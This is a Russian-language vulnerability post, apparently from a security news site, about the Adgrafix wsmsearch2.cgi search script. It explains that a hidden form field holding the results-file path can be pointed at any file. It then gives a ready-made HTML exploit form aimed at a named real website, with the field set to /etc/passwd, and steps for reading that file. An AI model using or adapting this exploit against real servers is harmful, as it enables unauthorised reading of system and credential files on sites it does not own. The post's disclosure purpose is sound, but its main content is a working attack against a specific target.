Скрипт: wsmsearch2.cgi 
Производитель: Adgrafix 
Cайт производителя: www.adgrafix.com

Данный скрипт предназначен для выполнения поиска по сайту, берет информацию из скрытых полей html-кода.
Вот фрагмент кода: 

--- 
<form method=POST action="/cgi-bin/wsmsearch2.cgi"> 
<B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1> Search Site:</FONT></FONT><br></B> 
<input type=text name="terms" size=20> 
<input type=hidden name=boolean value="AND"> 
<input type=hidden name=case value="Insensitive"> 
<input type=hidden name=quicksearch value="NO"> 
<input type=hidden name=max value="50"> 
<input type=hidden name=faqfile value="/"> 
<input type=hidden name=resultspage value="="/opt2/sdrforum/httpd/htdocs/results.html"> 
<input type=submit value="Search!"> 
--- 

/opt2/sdrforum/httpd/htdocs/results.html - это путь к файлу, в который выводятся результаты поиска
(<input type=hidden name=resultspage value="absolute path to HTML include file">).
Если заменить его на /etc/passwd, то вывод результатов поиска произойдет в него.

Так можно просматривать произвольные файлы в системе. 

Эксплоит: 

--- 
<form method=POST action="http://www.sdrforum.org/cgi-bin/wsmsearch2.cgi"> 
<B><FONT FACE="Arial,Helvetica"> <FONT SIZE=-1>Search Site:</FONT></FONT><br></B> 
<input type=text name="terms" size=20> 
<input type=hidden name=boolean value="AND"> 
<input type=hidden name=case value="Insensitive"> 
<input type=hidden name=quicksearch value="NO"> 
<input type=hidden name=max value="50"> 
<input type=hidden name=faqfile value="/"> 
<input type=hidden name=resultspage value="/etc/passwd"> 
<input type=submit value="Search!"> 
--- 

Сохраняем этот код в html файл, задаем слово для поиска, например, root и смотрим passwd.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии